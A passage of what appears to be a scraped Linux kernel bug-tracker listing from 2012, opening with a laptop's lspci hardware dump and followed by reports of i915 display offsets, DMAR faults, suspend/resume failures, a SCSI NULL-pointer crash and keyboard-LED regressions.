Kernel driver in use: agpgart-intel 00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller]) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 50 Region 0: Memory at c0000000 (64-bit, non-prefetchable) [size=4M] Region 2: Memory at b0000000 (64-bit, prefetchable) [size=256M] Region 4: I/O ports at 2000 [size=64] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee3000c Data: 41a9 Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a4] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: i915 Kernel modules: i915 00:16.0 Communication controller: Intel Corporation 6 Series/C200 Series Chipset Family MEI Controller #1 (rev 04) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 49 Region 0: Memory at c0704000 (64-bit, non-prefetchable) [size=16] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [8c] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000feeff00c Data: 41a1 Kernel driver in use: mei Kernel modules: mei 00:1a.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 0: Memory at c070a000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ehci_hcd 00:1b.0 Audio device: Intel Corporation 6 Series/C200 Series Chipset Family High Definition Audio Controller (rev 04) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 51 Region 0: Memory at c0700000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000feec000c Data: 41b9 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=22 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=00 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=00 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: snd_hda_intel Kernel modules: snd-hda-intel 00:1c.0 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 1 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: afb00000-afbfffff Prefetchable memory behind bridge: 00000000c0400000-00000000c04fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+ ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -3.5dB Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0504 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.1 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 2 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: c0600000-c06fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #1, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+ ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -3.5dB Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0504 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.3 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 4 (rev b4) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: c0500000-c05fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #4, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #3, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+ ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Acer Incorporated [ALI] Device 0504 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1d.0 USB Controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at c0709000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ehci_hcd 00:1f.0 ISA bridge: Intel Corporation HM65 Express Chipset Family LPC Controller (rev 04) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; Kernel modules: iTCO_wdt 00:1f.2 SATA controller: Intel Corporation 6 Series/C200 Series Chipset Family 6 port SATA AHCI Controller (rev 04) (prog-if 01 [AHCI 1.0]) Subsystem: Acer Incorporated [ALI] Device 0504 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 40 Region 0: I/O ports at 2098 [size=8] Region 1: I/O ports at 20bc [size=4] Region 2: I/O ports at 2090 [size=8] Region 3: I/O ports at 20b8 [size=4] Region 4: I/O ports at 2060 [size=32] Region 5: Memory at c0708000 (32-bit, non-prefetchable) [size=2K] Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4159 Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a8] SATA HBA v1.0 BAR4 Offset=00000004 Capabilities: [b0] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ahci Kernel modules: ahci 00:1f.3 SMBus: Intel Corporation 6 Series/C200 Series Chipset Family SMBus Controller (rev 04) Subsystem: Acer In</t>
  </si>
  <si>
    <t>i915 Modesetting - Offset Graphics - Panther Point Chipset with Sandy Bridge GPU</t>
  </si>
  <si>
    <t>3.3.0-030300-generic #201203182135</t>
  </si>
  <si>
    <t>2012-03-30 01:37 UTC</t>
  </si>
  <si>
    <t>Carl Richell</t>
  </si>
  <si>
    <t>See attached picture. Desktop is offset to the right a couple hundred pixels. Occurs in Plymouth, LightDM, and at the desktop. Replicable on two laptop models with Panther Point chipsets and Sandy Bridge GPU's. After Suspend and Resume the desktop is in the correct position. Bug is not present back at 3.0.26. Occurs in 3.1rc2 and forward (don't have an rc1 kernel build to test).</t>
  </si>
  <si>
    <t>3.4-rc1</t>
  </si>
  <si>
    <t>DRHD: handling fault status reg 3</t>
  </si>
  <si>
    <t>2012-04-01 19:25 UTC</t>
  </si>
  <si>
    <t>2012-04-16 21:57 UTC</t>
  </si>
  <si>
    <t>Hi guys, Not sure if this is yours issue just found that same errors were related to video adapters for elder kernels. Feel free to reassign this to correct person. In attach you can find a piece of kernel log. Once I try to log into X systems hangs and log is full of following messages and grow very fast. Apr 1 22:13:59 localhost kernel: [ 16.401918] iwlwifi 0000:03:00.0: L1 Disabled; Enabling L0S Apr 1 22:13:59 localhost kernel: [ 16.402057] iwlwifi 0000:03:00.0: Radio type=0x0-0x3-0x1 Apr 1 22:13:59 localhost kernel: [ 16.645293] iwlwifi 0000:03:00.0: L1 Disabled; Enabling L0S Apr 1 22:13:59 localhost kernel: [ 16.645430] iwlwifi 0000:03:00.0: Radio type=0x0-0x3-0x1 Apr 1 22:13:59 localhost kernel: [ 16.750150] ADDRCONF(NETDEV_UP): wlan0: link is not ready Apr 1 22:14:04 localhost kernel: [ 21.760949] DRHD: handling fault status reg 3 Apr 1 22:14:04 localhost kernel: [ 21.760959] DMAR:[DMA Write] Request device [00:02.0] fault addr 11717b000 Apr 1 22:14:04 localhost kernel: [ 21.760961] DMAR:[fault reason 05] PTE Write access is not set Apr 1 22:14:04 localhost kernel: [ 21.760966] DRHD: handling fault status reg 3 Apr 1 22:14:04 localhost kernel: [ 21.760970] DMAR:[DMA Write] Request device [00:02.0] fault addr 115ecb000 Apr 1 22:14:04 localhost kernel: [ 21.760972] DMAR:[fault reason 05] PTE Write access is not set Apr 1 22:14:04 localhost kernel: [ 21.760976] DRHD: handling fault status reg 3</t>
  </si>
  <si>
    <t>Laptop re-enters s2ram - Thinkpad t420s</t>
  </si>
  <si>
    <t>2012-04-02 07:49 UTC</t>
  </si>
  <si>
    <t>2012-05-21 05:04 UTC</t>
  </si>
  <si>
    <t>Hi guys, Today I faced very strange behavior on resume from s2ram on my Thinkpad t420s. Looks like it tries to resume power LED, capslock, keyboard flash and other indicators turn on, I hear that CPU fan starts spinning and HDD turns on. But in next second all turns off. Then all these actions start-over again and again. But laptop can't wake up. Please let me know if I can help with debugging this issue somehow.</t>
  </si>
  <si>
    <t>[945gm regression] laptop screen aligned left at lower resolutions</t>
  </si>
  <si>
    <t>3.4.0-rc1</t>
  </si>
  <si>
    <t>2012-04-08 08:02 UTC</t>
  </si>
  <si>
    <t>2012-07-01 09:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 72849 [details] output lspci My laptop has a 1280x800 display. At lower resolutions (1024x768, 800x600, 640x480) the the screen is scaled up to fit the screen vertically. So far so good, But after this the screen is not centered horizontally anymore, but moved to the left. the last column of if pixels is repeated on the remaining space on the right of the screen. Bisected to: commit ca9bfa7eed20ea34e862804e62aae10eb159edbb Author: Daniel Vetter &lt;daniel.vetter@ffwll.ch&gt; Date: Sat Jan 28 14:49:20 2012 +0100 drm/i915: fixup interlaced vertical timings confusion, part 1</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference (in scsi_send_eh_cmnd)</t>
  </si>
  <si>
    <t>3.4-rc2</t>
  </si>
  <si>
    <t>2012-04-10 09:53 UTC</t>
  </si>
  <si>
    <t>2012-05-12 12:53 UTC</t>
  </si>
  <si>
    <t>Created attachment 72868 [details] BUG - unable to handle kernel NULL pointer dereference (scsi_send_eh_cmnd) Whenever I plug my USB3 hub into the PC, I encounter this bug (log attached). It stops the PC from booting if the hub is inserted at the time, and crashes USB if I encounter it once the desktop is running. The line where it crashes is in scsi_error.c at line 782: struct scsi_driver *sdrv = scsi_cmd_to_driver(scmd); which expands to: struct scsi_driver *sdrv *(struct scsi_driver **)scmd-&gt;request-&gt;rq_disk-&gt;private_data The issue is that rq_disk is NULL (possibly because it's a USB hub and there isn't necessarily an underlying hard drive?). If I make it check for rq_disk being null before trying to assign sdrv and set sdrv to null accordingly, and then later in the function I check for sdrv being null before looking at sdrv-&gt;eh_action, the error goes away and drives on the hub seem to mount and function OK (mostly anyway).</t>
  </si>
  <si>
    <t>[965GM] hang at DPMS time</t>
  </si>
  <si>
    <t>3.2.14</t>
  </si>
  <si>
    <t>2012-04-10 20:28 UTC</t>
  </si>
  <si>
    <t>Martin Senft</t>
  </si>
  <si>
    <t>2012-04-18 22:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 72873 [details] lspci -vvnn Hello, I have the Ubuntu 12.04 beta2 x86_64 with a mainline kernel 3.2.14 installed on a FUJITSU SIEMENS ESPRIMO Mobile M9400 notebook with an Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (lspci -vvnn attached), and I'm experiencing GPU hangups several times a day (dmesg output attached). Everything is well as long as I don't leave the computer for long enough for a DPMS powersaving to kick in (set to 5 minutes in Unity). If I'm away long enough, there is a good chance I'll find the GPU hanged up upon return. Unfortunately, I'm not able to reproduce this issue at will and have to wait for it to happen. If there is anything I can do to help to resolve this, I'll gladly do so. Martin Senft</t>
  </si>
  <si>
    <t>touchpad lost with "i8042: Can't reactivate AUX port" after s2ram</t>
  </si>
  <si>
    <t>3.4.0-rc2</t>
  </si>
  <si>
    <t>2012-04-13 09:28 UTC</t>
  </si>
  <si>
    <t>2012-04-18 17:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 72904 [details] dmesg with touchpad failing after 1st s2ram, working after 2nd and 3rd On HP dv5-1250eo laptop the touch pad doesn't work after s2ram. Kernel 3.3 works, 3.4-rc1 does not. The dmesg contains these (see the full log attached): ACPI Exception: AE_TIME, Returned by Handler for [EmbeddedControl] (20120320/evregion-501) ACPI Error: Method parse/execution failed [\_SB_.WMID.GDKS] (Node ffff88013b03e550), AE_TIME (20120320/psparse-536) ACPI Error: Method parse/execution failed [\_SB_.WMID.HWMC] (Node ffff88013b03e370), AE_TIME (20120320/psparse-536) ACPI Error: Method parse/execution failed [\_SB_.WMID.WMAD] (Node ffff88013b03e4d8), AE_TIME (20120320/psparse-536) ACPI Exception: AE_TIME, Returned by Handler for [EmbeddedControl] (20120320/evregion-501) ACPI Error: Method parse/execution failed [\_SB_.WMID.GDKS] (Node ffff88013b03e550), AE_TIME (20120320/psparse-536) ACPI Error: Method parse/execution failed [\_SB_.WMID.HWMC] (Node ffff88013b03e370), AE_TIME (20120320/psparse-536) ACPI Error: Method parse/execution failed [\_SB_.WMID.WMAD] (Node ffff88013b03e4d8), AE_TIME (20120320/psparse-536) PM: resume of devices complete after 17388.013 msecs i8042: Can't write CTR while closing AUX port i8042: Can't reactivate AUX port At this state, the laptop's touch pad doesn't work. Also the capslock led doesn't work, but otherwise the keyboard seems to work. If I try to reboot at this phase, the machine will hang just before actually rebooting. At least once the end of the printout contained Restarting system. machine restart ACPI MEMORY or I/O RESET_REG. ACPI Error: Unsupported register bit width: 0x0 (20120320/hwregs-121) ACPI MEMORY or I/O RESET_REG. ACPI Error: Unsupported register bit width: 0x0 (20120320/hwregs-121) although the ACPI messages don't appear with every hang. It seems the touchpad comes back to live after a second s2ram. The attached dmesg log spans three suspends with PCI and i8042 debug options turned on, with the touchpad failing only between the first and second s2ram. I bisected this problem to the following commit. Reverting this on top of 3.4.0-rc2 (3.4.0-rc2-CUST-00269-g4166fb6 to be exact) fixes the problem for me. 26f41062f28de65e11d3cf353e52d0be73442be1 is the first bad commit commit 26f41062f28de65e11d3cf353e52d0be73442be1 Author: Kay, Allen M &lt;allen.m.kay@intel.com&gt; Date: Thu Jan 26 10:25:53 2012 -0800 PCI: check for pci bar restore completion and retry On some OEM systems, pci_restore_state() is called while FLR has not yet completed. As a result, PCI BAR register restore is not successful. This fix reads back the restored value and compares it with saved value and re-tries 10 times before giving up. Signed-off-by: Jean Guyader &lt;jean.guyader@eu.citrix.com&gt; Signed-off-by: Eric Chanudet &lt;eric.chanudet@citrix.com&gt; Signed-off-by: Allen Kay &lt;allen.m.kay@intel.com&gt; Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; :040000 040000 c7fcf515fdc69ecaa6698f3a6b49a8f14dada300 ea3c0b306e860e186838e9956cb3b4c29704bcb3 M drivers</t>
  </si>
  <si>
    <t>Kernel locks up when the Scroll Lock key is pressed</t>
  </si>
  <si>
    <t>2012-04-20 14:24 UTC</t>
  </si>
  <si>
    <t>acaizzo</t>
  </si>
  <si>
    <t>2012-05-12 00:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 73021 [details] Kernel configuration Pressing the Scroll Lock key while in a virtual terminal (both plain text mode or framebuffer) causes the kernel to hang. SysRq doesn't work anymore, network connections fall, disk activity appears to stop. 3.4.0-rc3 is also affected. 3.3.1 and 3.3.2 are OK. I couldn't try 3.4.0-rc1 because it does not boot on my machine. I tested the same kernel binary on both an old pentium 4 and an intel netbook, with the same results. Pressing CTRL-S/CTRL-Q instead works as usual and does NOT trigger the problem. Attaching the kernel config and the dmesg output. The latter doesn't seem to contain any information directly related to the problem though.</t>
  </si>
  <si>
    <t>setleds fails with KDSKBLED: invalid argument since 3.4-rc4</t>
  </si>
  <si>
    <t>2012-04-22 15:48 UTC</t>
  </si>
  <si>
    <t>2012-08-05 21:27 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 7750G Core i7/6GB Slackware64 13.37 Since 3.4-rc4, I get the following warning from setleds in the following command: setleds -D +num &lt; /dev/tty0 KDSKBLED: Invalid argument The numlock flag is successfully set, but the warning is new.</t>
  </si>
  <si>
    <t>Breaking connection of internet.</t>
  </si>
  <si>
    <t>2012-04-25 15:38 UTC</t>
  </si>
  <si>
    <t>Jerzy Spendel</t>
  </si>
  <si>
    <t>2012-08-11 15:34 UTC</t>
  </si>
  <si>
